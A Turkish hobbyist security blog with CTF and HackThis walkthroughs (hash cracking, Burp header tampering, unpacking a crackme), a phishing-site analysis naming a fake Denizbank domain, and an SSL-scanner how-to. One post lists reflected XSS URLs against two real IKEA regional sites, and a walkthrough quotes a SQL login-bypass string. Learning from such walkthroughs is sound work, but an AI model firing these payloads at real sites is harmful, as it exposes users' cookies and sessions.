h34h43kjbjb-blog
h34h43kjbjb-blog
4Y34Y3
39 posts
Don't wanna be here? Send us removal request.
h34h43kjbjb-blog · 7 years ago
Text
Python Kullanıcı Girişi
- Kullanıcı adı ve Şifre kod içerisinde otomatik olarak tanımlı, - Herhangi bir karakter sınırı bulunmamakta Phyton konusunda daha 40 fırın ekmek yememiz gerektiğinin farkındayız, Herhangi bir hatam varsa affola, Sizlerden bu konuda daha iyi olabilmek için gerekli yorumlarınızı bekliyorum 
Tumblr media
kullanici_adi=input("Kullanıcı adınızı giriniz : ") sifre=input("Sifrenizi giriniz : ") if kullanici_adi=="ultra723" and sifre=='tht': print("Giriş Başarılı") elif kullanici_adi=="" or sifre=="": print("Lutfen Bilgileri Giriniz") else: print("Giriş Başarısız")
Güncelleme :
kuladi = "ultra723" sifresi = "tht" kullanici_adi=input("Kullanıcı adınızı giriniz : ") sifre=input("Sifrenizi giriniz : ") if kullanici_adi==kuladi and sifre==sifresi: print("Giriş Başarılı...") elif kullanici_adi=="" and sifre=="": print("Lutfen Bilgileri Giriniz.") elif kullanici_adi==kuladi and sifre!=sifresi: print("Kullanıcı adınız doğru, Fakat Şifreniz Yanlış --- > Tekrar Deneyiniz.") elif kullanici_adi!=kuladi and sifre==sifresi: print("Şifreniz Doğru, Fakat Kullanıcı Adınız Yanlış --- > Tekrar Deneyiniz.") elif kullanici_adi!=kuladi and sifre!=sifresi: print("Girdiğiniz Bilgileri Kontrol Ediniz.") else: print("Giriş Başarısız...")
0 notes
h34h43kjbjb-blog · 7 years ago
Text
Python Şaka Virüsü Alıntıdır.
Kodlama Alıntıdır ; https://github.com/HissingCockroach/...aster/Virus.py
import time import pygame import sys import os pygame.init() screen = pygame.display.set_mode((450,150)) pygame.display.set_caption('Message from Admin') font = pygame.font.SysFont("Lucida Console", 20) label = font.render("Hacked by Ultra723 // THT :)", 1, (0,0,0)) while True: for event in pygame.event.get(): if event.type==pygame.QUIT: pygame.quit() time.sleep(0.10) screen = pygame.display.set_mode((250,150)) pygame.display.set_caption('Message from Admin') screen.fill((255,255,255)) screen.blit(label, (50,50)) pygame.display.update()
0 notes
h34h43kjbjb-blog · 7 years ago
Text
Python Şifre oluşturucu
Kod'da bir hatam varsa Affola
import random karakter = "abcdefghijklmnopqrstuvwxyz01234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ" uzunluk = int(input("Kac karakterli olmasini istiyorsunuz : ")) sifre = "".join(random.sample(karakter,uzunluk )) print (sifre)
0 notes
h34h43kjbjb-blog · 7 years ago
Text
Deniz Bank ait olmayan Phishing site
Arkadaşlar öncelikle şunu belirtmek istiyorum, benim bu konularda ne bir iddaam var ne de kendimi gösterme amacım var, sadece çok çok çok az'da olsa bilinçlenmenizi istiyorum
Saat vs. resimde görülüyor zaten bu mesaj geldiğinde bazı insanlar ister istemez "aaaa evet benim deniz bank kartım var, bunu geri almassam kaybolup gidecek hemen şunu halledeyim" diyerek siteye giriyor ve normal deniz bank online bankacılık sitesinin tıpa tıp aynısı olduğu için kimse herhangi birşeyi farketmeden istenilen bilgileri girecektir..
Tumblr media
Fakat mesajı görür görmez "sdenizbank" isminde sitenin bilgi çalmak amacıyla kurulduğunu bariz bi şekilde anladım / anlaşılmaması mümkün değildir..
1 - Vırustotal Taramasına bakalım ; 
Tumblr media
2 - Link ; - Site linki /iade şeklinde bitiyor, merakıma yenik düşüp /iade'yi silerek siteye giriş yapmak istedim
Tumblr media
Sizcede İlginç değil mi ?
3 - WireShark üzerinden yönlendirmeler - Yine merakıma yenik düşerek wireshark'ı açıp sitede giriş denesi yaptım wireshark ekranına baktığımızda
Tumblr media
İşaretli kısma bakın /iade/index_files isminde bir link'teki png dosyasını çağırıyor, bu seferde bu linke giriş yapıp neler gördüğümüze bakalım
Site :
Index of /iade/index_files
http://sdenizbank.com/iade/index_fil...urity.js.indir
4 - Whois Bilgisi ; 
11. ayın 5'inde açılan bir site 
Tumblr media
Şimdi Asıl sorum, bu şekilde olan bir siteye siz olsanız giriş yapar mısınız ?
Tumblr media
0 notes
h34h43kjbjb-blog · 7 years ago
Text
Online CTF - Look Me Up
Arkadaşlar her konuda belirttiğim gibi bu konularda bir iddaam bulunmamakta Fakat büyük bir ilgim var ... illaki bir hata veya kullandığım terimlerde bir yanlışlık vardıR, yapacağınız yorumlarda buna göre olursa mutlu olurum, yanlışlarım güzel bir dille belirtmeniz dileğiyle
Aslına bakılırsa, bu konuda hem CTF çözmüş olduk hem de sql sever'e mdf nasıl import edilir onunda cevabını almış olacağınızı düşünüyorum
Soru Linki ; https://www.onlinectf.com/challenge/look-me-up
Sorunun cevabı yandex disk üzerinden indireceğimiz dosyalar ( .ldf ve .mdf ) dosyalarında olduğundan bahsediyor, gerekli flag'in ' ile başlayıp = ile bittiğinden bahsediyor ve bulduğumuz şifreyi kırmayla uğraşmamızla ilgili bilgiler veriyor ... Gerekli Dosyaları indirerek başlayalım....
Dosya uzantılarından kısaca bahsetmek gerekirse ;
.ldf = log data files yani sql server log dosyalarıdır. .mdf = veritabanının kendisi... İndirdiğimiz dosyaları sql server'imize import ederek başlayabiliriz, Öncelikle Sql server Management Studio'ya ihtiyacımız olmaktadır, ilk açtığımızda bizden Server Name isteyecektir ( her bilgisayarın farklıdır, bunu yüklerken ayarlamış olmanız gerekmektedir ) Server'imize bağlandıktan sonra indirdiğimiz dosyaları serverimize yükleyebiliriz... Sql server üzerinden mdf yükleyeceğimiz için Databases üzerine sağ click yaparak Attach Seçilmelidir.
Açılan pencerede Dosyamızın konumunu belirtmeliyiz C yada D içerisinde olursa bulmamız daha kolay olacaktır..
Tumblr media
Görüldüğü gibi indirdiğimiz dosyalar, Yukarıda görüldüğü gibi Details bölümünde görülebiliyor.. OK butonunu kullanarak import edebiliriz, Eğer bir hata ile karşılaşmaz isek Databases kısmına bu veritabanı eklenmiş olacaktır.. Şimdi asıl sorumuza gelelim, ihtiyacımız olan şifre nerede ? Gördüğünüz gibi veritabanında çok fazla tablo bulunmakta bir o kadar da sizin görmedikleriniz bulunmaktadır. Bu sorunun illaki farklı bir çözüm yoluda vardır fakat ben tablolar arasında şifrenin içinde olabileceği kısımlara bakmayı tercih ettim, İllaki / kesin, sqlmap veya havij kullanmışsınızdır, ihtiyaç duyduğumuz şifreleri bu şekilde isimlendirilen tablolardan bulmuşuzdur, bu şekilde düşünerek devam ediyorum Şimdi ister ipucuna bağlı kalarak şifreyi bulursunuz, istersen direk tablo'ya girerek şifreyi edinebilirsiniz ; Tablodan şifreyi bulmak istersek ; dbo.PW_USER isimli tabloya sağ tıklayıp EDİT TOP 200 ROWS'u seçmemiz gereklidir Bunu yaptığımızda Ekrana şu şekilde bir tablo açılacak
Ve görüldüğü gibi işaretli yerde ihtiyacımız olan şifreyi bulmuş oluruz.
İpucundan yola çıkarak bulmak istersek ; Sql Server Management üzerinden New Query'i kullabiliriz Açılacak ekranda ipucunu kullanarak gerekli sorguyu yapabiliriz use CC_CIPdemo_15_07_28_00_16_52 ; import ettiğimiz veritabanının seçilmesi için, SELECT * FROM dbo.PW_USER ; sorgunun yapılacağı tablonun ismi için, WHERE pass LIKE '%=' ; pass isimli column eğer ki yüzlerce satır varsa ( olabilir ) bunların içinden = ile bitenlerin ekrana yazdırılmasını istediğimiz için kullanabiliriz. Yazdığımız sorguyu tamamen seçip Execute butonuna basarsak sorgumuzun ekrana çıktısını görebiliriz
Gördüğünüz gibi 2 seçenekle de istenilen şifreye ulaşmış olduk şimdi son aşama şifremizi kopyalayarak CTF ekranında ilgili kısıma yapıştırıp bölümü geçmemiz kaldı..
Bölümü tamamlamış olduk 
Tumblr media
0 notes
h34h43kjbjb-blog · 7 years ago
Text
Online CTF - Be Careful
Arkadaşlar her konuda belirttiğim gibi bu konularda bir iddaam bulunmamakta Fakat büyük bir ilgim var ... illaki bir hata veya kullandığım terimlerde bir yanlışlık vardıR, yapacağınız yorumlarda buna göre olursa mutlu olurum, yanlışlarım güzel bir dille belirtmeniz dileğiyle
Soru Linki ; https://www.onlinectf.com/challenge/...s-what-you-get
Soruda, Yakalanmadan 
Tumblr media
 Güvenli bir şekilde giriş sağlamamızı istiyor ve birde girişi yapmamızı istediği siteyi vermiş Be_careful | CTF Challenge
Sitede İstenilen 2 tane bileşen var ; ENTER Code ve Password
Siteye girer girmez ezbere işlemler yaparak login bypass'ları denedim, örneğin ; ' or ''=' fakat olmadı Daha sonra Genel olarak CTF'lerin ilk soruları ve kolay sorularında kaynak koda bir ipucu saklanmıştır veyahut şifreyi kaynak kod arasında gizlemiş olabilirler düşüncesiyle kaynak kodları inceleyelim
Sayfada görebileceğimiz ne türden bir yazı varsa kaynak kodlarda o şekilde font ayarları yapılmış bi şekilde gözüküyor bir kısım hariç Kaynak kod içerisinde şu şekilde bir satır var ;
<font color="#FFFFFF"><span lang="el"> </span>t0pS3cr3T, c0NFid3nTiaL</font>
Fakat sayfayı incelediğimizde bu şekilde bir yazı göremiyoruz, ilgili kısımlara sırasıyla ; enter code ; t0pS3cr3T password ; c0NFid3nTiaL şeklinde tamamlayıp ENTER! butonuna bastığımızda şu şekilde bir ekran gelecek...
Ekranda da görüldüğü gibi istenilen flag{}'e de ulaşmış olduk tek yapmamız gereken CTF ekranında flag{}'i yerleştirip bölümü geçmemiz kaldı...
Bölümü tamamlamış olduk 
Tumblr media
0 notes
h34h43kjbjb-blog · 7 years ago
Text
Otomatik SSL güvenlik açığı tarama [a2sv]
Arkadaşlar Bu konularda araştırma yaparak öğrenmeye çalışıyorum ve SSL güvenlik açığı taramayı, ilimin döndüğü kadarıyla sizlere a2sv'yi anlatmaya çalışt��m, illaki bir yanlışım veya hatam vardır, bu konuda bilgilendirirseniz sevinirim 
Tumblr media
 Ayrıca evet farkındayım bu anlattığım programın %1'i bile değildir fakat herşeyin bir başlangıç noktası vardır 
Tumblr media
Python üzerinden SSL güvenlik açığı tarayabilmemiz için öncelikle Sanal makina yada VPS üzerinde kurulu Linux işletim sistemine sahip olmamız gerekmektedir, Kurulumu ve kullanımı şimdilik VPS üzerinden anlatacağım Öncelikle ihtiyacımız olan dosyayı yani a2sv'yi indirmemiz için Terminal üzerinden aşağıdaki kodu giriyoruz
git clone https://github.com/hahwul/a2sv.git
indirme işlemi tamamlandıktan sonra masaüstüne gelen klasöre terminal üzerinden girmemiz gerekmektedir
cd a2sv/
Bu işlemler tamamlandıktan sonra isterseniz programda ile yapabilecekleriniz ile ilgili yardım alın veya direk hedef sitenin ip adresi üzerinden tarama yapabilirsiniz.. a2sv yapabileceklerin ile ilgili bilgi almak için [port, module kullanımı] ; 
python a2sv.py -h
Hedef site basit tarama için ; 
python a2sv.py -t HEDEFSİTE_İP
Site taraması sonucu en alt kısımda Güvenlik Açığı olup olmadığını göstermektedir, Mevcut Vulnerability'lerin karşılarında güvenlik açığı varsa Vulnerable!, güvenlik açığı yok ise Not Vulnerable. Bunlardan yola çıkarak güvenlik açıklarını kullanımını google üzerinden araştırabilirsiniz, boş bir vaktim olduğunda bunun ile ilgili bir konu açmaya çalışacağım
0 notes
h34h43kjbjb-blog · 7 years ago
Text
Porto Riko İKEA + Dominik İKEA XSS açığı
Porto Riko 
https://mayaguez.ikea.pr/mayaguez/desktop/es_pr/product/&search=%22%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3E
Dominik 
https://www.ikea.com.do/santodomingo/desktop/es_do/product/&search=%22%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3E
0 notes
h34h43kjbjb-blog · 7 years ago
Text
Pentesters İnspirational Guide
https://docs.google.com/document/d/1YcT2aBD_LecTCJwqw4DENZGXcJgmKGP-UXh06i2HgXg
0 notes
h34h43kjbjb-blog · 7 years ago
Text
Crack Me #1 - Çözümü // Tersine Mühendislik
Crack Me #1 isimli konuyu yapamayan arkadaşlar için basit bir dil ile çözüm yolunu anlatmaya çalışacağım 
Tumblr media
Arkadaşlar öncelikle DnSpy ile açtığımız vakit herhangi bir form ismi veya aradığınızı bulamadığınızı farkedeceksinizdir.
Tumblr media
ama orda büyük bir ipucu var halen farketmediyseniz, DnSpy'de ki .exe'mize seçerek yan taraftaki şifreleme türünü öğrenebilirsiniz
Tumblr media
Sırada bu şifreleme türünü nasıl geçeceğimizi öğrenmemize kaldı, Bu şifreleme türünü ilk öğrendiğimde youtube üzerinden gayet güzel bir video bulmuştum ve gerekli işlemleride oradan öğrenmiştim, şimdilerde rahatlıkla yapabiliyorum tabi uzmanım demiyorum bazı konularda kendimce çözmeye çalışıyorum 
Tumblr media
Öncelikle DnSpy üzerinden dosyamıza yani heyo 'ya sağ tık yaparak açılan menüden
Tumblr media
Go to <Module> .cctor'a basarak .exe'nin module 'sine gitmemiz gerekiyor şimdi ihtiyacımız olan ulaştığımız module dosyasının içerisinde .Free 'yi aratmamız [CTRL + F kullanılabiliyor biliyorsunuzdur...]
Tumblr media
Bulduktan sonra gchandle.Free(); üzerine sağ click yaparak breakpoints koyalım ki program çalıştığında bu kısma gelince duraklatılsın
Tumblr media
Bu kısmıda hallettikten sonra breakpoint'li haliyle exe'mizi Start butonuna basarak Debug Edelim
Start edince programın açılmasını bekleyeceksiniz fakat açılmayacak çünkü programımıza breakpoint bıraktığımız için duraklatıldı, şimdi yapmamız gereken şifrelenmiş exe içerisinde ihtiyacımız olan asıl exe'yi çekmemiz olmalı, Alt kısımda göreceğim gibi Locals - Search ve Modules bölümleri mevcut Modules kısmına geçelim ve
Tumblr media
Ultra723_2.exe ve koi isimli uygulamalara sağ click kullanarak Save Module ile masaüstüne kaydedelim...
Tumblr media
Evet, Şimdi DnSpy üzerinden heyo'yu silelim ve masaüstüne kaybettiğimiz exe'leri DnSpy üzerine sürükle bırak yaparak kaynak kodlarına ulaşamaya çalışalım,
Tumblr media
Birazcık uğraşıp inceledikten sonra ihtiyacımız olan exe'nin koi isimli exe olduğunu göreceksiniz şimdi tek yapmamız gereken Şifreye ulaşmak
Tumblr media
ve son olarak indirdiğimiz exe'yi açarak şifreyi deneyelim,
Tumblr media
BİNGO !!! Gördüğünüz gibi Şifre Doğru 
Tumblr media
Anlatım tarzımı beğenmeyenler olabilir yada benim seçtiğim kelimelerden ötürü hatalarım olmuş olabilir, Affedin 
Tumblr media
0 notes
h34h43kjbjb-blog · 7 years ago
Text
Crack Me #1 - Soru // Tersine Mühendislik
Dosya.tc : Crack Me #1
VirusTotal : https://www.virustotal.com/#/file/1f3252d97ab4e5829877b8e6cffb29302dee453b32c3b38138c1b096b94cf2ee/detection
0 notes
h34h43kjbjb-blog · 7 years ago
Text
Bug Bounty
https://medium.com/bugbountyhunting/bug-bounty-toolkit-aa36f4365f3f   https://hackerone.com   https://www.exploit-db.com/docs/english/44319-web-application-security-testing.pdf   https://doc.lagout.org/security/The-Hacker-Playbook-Practical-Guide-To-Penetration-Testing-2014.pdf
0 notes
h34h43kjbjb-blog · 8 years ago
Text
Basic+ Level 2 – HackThis!
HackThis! Basic + serisinde yeni bir bölüm daha Basic+ Level 2'nin çözümüne ulaşalım.
Yine, ipucuna bakarak ba��lıyoruz :
The site will only authenticate browsers with the correct user agent.
ve bu mesajın ardından şu mesaj geliyor :
User agent not accepted, only secure_user_agent allowed
Bu nedenle, bir kez daha, ipucu zaten bildiklerimize fazla bilgi eklemez.
Tarayıcı aracımızı secure_user_agent olarak nasıl değiştirebilirim? Böyle bir tarayıcı yok. Bir kez daha, cevap, bu serideki diğer öğreticilerde çalışmak için zaten vazgeçilemediğimiz güçlü bir aracı kullanarak: BurpSuite. Basic + Level 2'nin web sayfasını açık tutarak, BurpSuite'ı da yükleriz ve gerekirse durdurmayı açarız (varsayılan olarak açık olmalıdır). Daha sonra sayfayı yeniliyoruz. Programın Üstbilgileri sekmesinde gördüğümüz şey budur. Buradan, aracı parametresini secure_user_agent olarak değiştirip trafiği web sitesine iletmeye devam ediyoruz. İşte gidiyoruz, sonra 3. Seviyeye gidiyoruz.   [youtube https://www.youtube.com/watch?v=e-k6zlHJxdI&w=560&h=315]
0 notes
h34h43kjbjb-blog · 8 years ago
Text
Basic+ Level 1 – HackThis!
Main Level bittiğine göre şimdi Basic+ düzeylerine bakma zamanı geldi. Basic+ Level 1 ile başlayarak, şuan her zaman yaptığımız gibi ipucuna bakıyoruz.
Download the file and try to read the hidden message.
Şimdi, bir linux makinde çalıştığınızı ( veya birine eriştiğini varsayarsak), bu çözmek oldukça kolay bir seviyedir. Tek yapmamız gereken dosyayı wget komutu ile indirme ve kabuğu konumunda açmak için şunu yazmaktır. İndirme için ; wget https://www.hackthis.co.uk/levels/extras/b1.txt Kabuğu açmak için ; file b1.txt Bu komut, dosyanın biçimini söyleyecektir. Komut çalıştırıldığında şu çıktıları verir :
b1.txt: PC bitmap, Windows 3.x format, 213 x 108 x 24
Şüphelendiğimiz gibi, Tek yapmamız gereken, uzantısını .bmp olarak değiştirmek ve açmaktır, sonuç görüldüğü gibi Tek yapmamız gereken sitedeki ilgili yerlere resimdeki bilgileri girip seviyeyi geçmemiz kaldı.
0 notes
h34h43kjbjb-blog · 8 years ago
Text
Main Level 10 – HackThis!
Sonunda HackThis!'in ilk turunun son bölümüne ulaşıyoruz. Main Level 10 serisinin sonuncusu, Bundan sonraki seri Basic+ düzeyince bakacağız Her zamanki gibi ipucu okuyarak başlıyoruz :
Encrypted passwords can be quite difficult to decode, but when you use a common method there is usually a way to get around it. Especially when the encrypted information are simple common words.
Bu, parolanın sayfanın herhangi bir yerinde olması gerektiği anlamına gelir. Kaynak kodlarını incelediğimizde 868 ile 873. satırlar arasını incelememiz gerekmektedir.
<label for="user">Username:</label> <input type="Text" name="user" id="user" autocomplete="off"><br> <label for="user">Password:</label> <input type="Password" name="pass" id="pass" autocomplete="off"><br> <input type="hidden" name="passwordfile" value="level10pass.txt"> <input type="submit" value="Submit" class="button">
Bu stratagem'i diğer oyunlarda da gördük. Parola dosyalarının yolu /extras/ klasöründedir. Bu nedenle, https://www.hackthis.co.uk/levels/extras/level10pass.txt adresine gidiyoruz ve şunu okuyoruz :
69bfe1e6e44821df7f8a0927bd7e61ef208fdb25deaa4353450bc3fb904abd52   f1abe1b083d12d181ae136cfc75b8d18a8ecb43ac4e9d1a36d6a9c75b6016b61
Alfasayısal bir dize görürseniz ve şiflenmiş bir şifre olduğunu biliyorsanız, büyük olasılıkla bir karma olacaktır. Şifreler için yaygın olarak kullanılan karma algoritmalar MD5, SHA-1 ve SHA-2'yi içerir. SHA-2, en güçlüsü ve en zor kırılanıdır. MD5 ve SHA-1'in her ikisi dekırıktır Hangi karma algoritmasının kullanıldığını bilmediğimiz için, karmayı karmaşa harfiyle denemek, bitleri saymak ve algoritmayı tahmin etmeye çalışmak veya kolay yolu kullanarak CrackStation'ı kullanabiliriz. Bu web sitesinde herhangi bir karma değer girilebilir ve her ikisi de destekleniyorsa ve veritabanında mevcutsa - bu 15GB dosya dahil herkese açıktır..
Bu durumda, elde ettiğimiz şifreleri girersek :
69bfe1e6e44821df7f8a0927bd7e61ef208fdb25deaa4353450bc3fb904abd52 f1abe1b083d12d181ae136cfc75b8d18a8ecb43ac4e9d1a36d6a9c75b6016b61
Çıktı :
carl guess
Ve bunların her ikisinin de SHA-2'nin bir varyantı olan SHA-256 karmaları olduğunu keşfediyoruz. Şimdi siteye geri dönüp çıktıları ilgili yerlere girerek Main level serisini bitirmiş oluyoruz.
0 notes
h34h43kjbjb-blog · 8 years ago
Text
Main Level 9 – HackThis!
HackThis!'de başka bir bölüm, Main Level 9'Un çözümüne bakalım. Ipucumuza bakalım :
The developer has now added a feature that allows him to get a password reminder. Can you exploit it to send you the login details instead?
Önce ne olduğunu görmek için "Request details" butonuna tıklıyoruz. Bu bizi şifrenin hatırlatılması için bir e-posta adresi girebileceğimiz başka bir sayfaya götürür. Bununla birlikte, girdiğimiz her verilen posta adresinin "Yanlış e-posta adresi" uyarısını tetikler Dolayısıyla kaynak koduna bakıyoruz :
<label for="email1">Email:</label> <input type="text" name="email1" id="email1" autocomplete="off"><br> <input type="hidden" name="email2" id="email2" value="[email protected]" autocomplete="off"> <input type="submit" value="Submit" class="button">
Elbette [email protected] e-posta adresini girmeniz işe yarayacak, ancak şifre hatırlatıcısı bize gönderilmeyecektir. Bir şekilde şifre hatırlatıcıyı e-posta adresimize yollamamız gerekiyor. Bunu yapmak için sistemi "fool" adresinde olmadığında bile "right" adresini gönderdiğimize inandırmak için kandırmamız gerekiyor. Bu, daha önce incelediğimiz, BurpSuite olarak bilinen aracı kullanarak yapabiliriz Giriş e-postasının gönderildiği sayfadayken Proxy sekmesindeki "Intercept is on" butonunu aktif hale getirip yöneticinin e-postasını yazıp "Gönder"'i tıklamalıyız. BurpSuite yoluyla yönlendirilen trafik, şu şekilde gösterecektir. Buradan, girilen e-postada yapılan en muhtemel kontrolin kayıtlı e-postayla karşılık gelip gelmediğini belirleyebiliriz. Bu nedenle, hem düzenleme hem de kendi alanlarındaki e-postalarımızı her iki alanda da girmeye çalışmalıdır. Çözüm Tamda buydu. Parola e-postayla gönderilmeyecektir, ancak email1 ve email2 parametrelerini başka bir e-postayla değiştirmeniz ve ardından "Gönder" tuşuna basmanız size bir geçiş hakkı tanıyacaktır
0 notes
h34h43kjbjb-blog · 8 years ago
Text
Main Level 8 – HackThis!
HackThis!'in bir başka serisi olan Main Level 8'den devam ediyoruz İpucumuz ;
The coder has made the same mistake as level 4 but this time at least he has tried to protect the password. The password has been encrypted, convert the binary into something that is easier for humans to read (base 16).
If you think you have the right answer but it isn't being accepted, submit your answer in CAPITALS.
4'de dahil olmak üzere bu düzeylerin çoğu, sayfanın kaynak kodunu analiz edilerek çözülebilir. Bu durumda, tam olarak şunu yapıyoruz, "pass" ve "password" gibi anahtar kelimeleri kaynak kod içerisinde CTRL+F ile aratıyoruz ve karşımıza 868 ve 873. satırlar arası gözümüze çarpıyor
<label for="user">Username:</label> <input type="Text" name="user" id="user" autocomplete="off"><br> <label for="user">Password:</label> <input type="Password" name="pass" id="pass" autocomplete="off"><br> <input type="hidden" name="passwordfile" value="extras/secret.txt"> <input type="submit" value="Submit" class="button">
Gizli girdi alanı şifre dosyasının nerede olduğunu gösterir. Bundan dolayı https://www.hackthis.co.uk/levels/extras/secret.txt linkine giderek incelememiz gerekiyor.
1011 0000 0000 1011 1111  1110  1110 1101
ipucunun temelinde karakterin 16 haneli olduğu söyleniyor, bu nedenle linkte ki şifrelemeyi dönüştürmemiz gerekiyor , binary to hex İhtiyacımız olan convert sitesi ; http://www.binaryhexconverter.com/binary-to-hex-converter
1011 0000 0000 1011 = B00B
1111  1110  1110 1101 = FEED
Çözülen, kullanıcı adı ve şifreyi girerek bölümü geçmiş olduk.
0 notes